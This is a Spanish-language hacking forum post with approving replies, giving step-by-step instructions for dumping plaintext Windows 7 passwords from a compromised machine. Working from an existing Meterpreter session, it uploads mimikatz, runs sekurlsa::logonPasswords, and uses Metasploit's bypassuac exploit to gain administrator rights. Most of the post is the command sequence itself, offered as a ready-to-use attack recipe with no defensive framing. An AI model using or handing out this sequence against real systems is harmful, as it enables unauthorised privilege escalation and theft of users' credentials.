Meterpreter + mimikatz

Iniciado por Typh0n, Marzo 05, 2014, 05:52:00 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 05, 2014, 05:52:00 AM Ultima modificación: Marzo 05, 2014, 05:55:34 AM por Typh0n

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: bash
getsystem
o también

Código: bash
hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: bash
shell


y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: bash

privilege::debug
sekurlsa::logonPasswords full


Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: bash
background




Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: bash

use exploit/windows/local/bypassuac
set SESSION 1
exploit




Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: bash
sessions -i 2


nos damos cuenta que tenemos maximos privilegios con el comando

Código: bash
getuid




Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos  :)


Que buen post bro!!!
Excelente!


Buenaaas

Muy bien explicado, solo hay que ponerlo a prueba.

Un saludo
Ralph wiggum

que buen post, me funciono bien

Muy buen aporte, gracias por esta comunidad con material de calidad, lo pruebo y les comento

Muy bueno Typh0n!!!!
Felicidades!

CrazyKade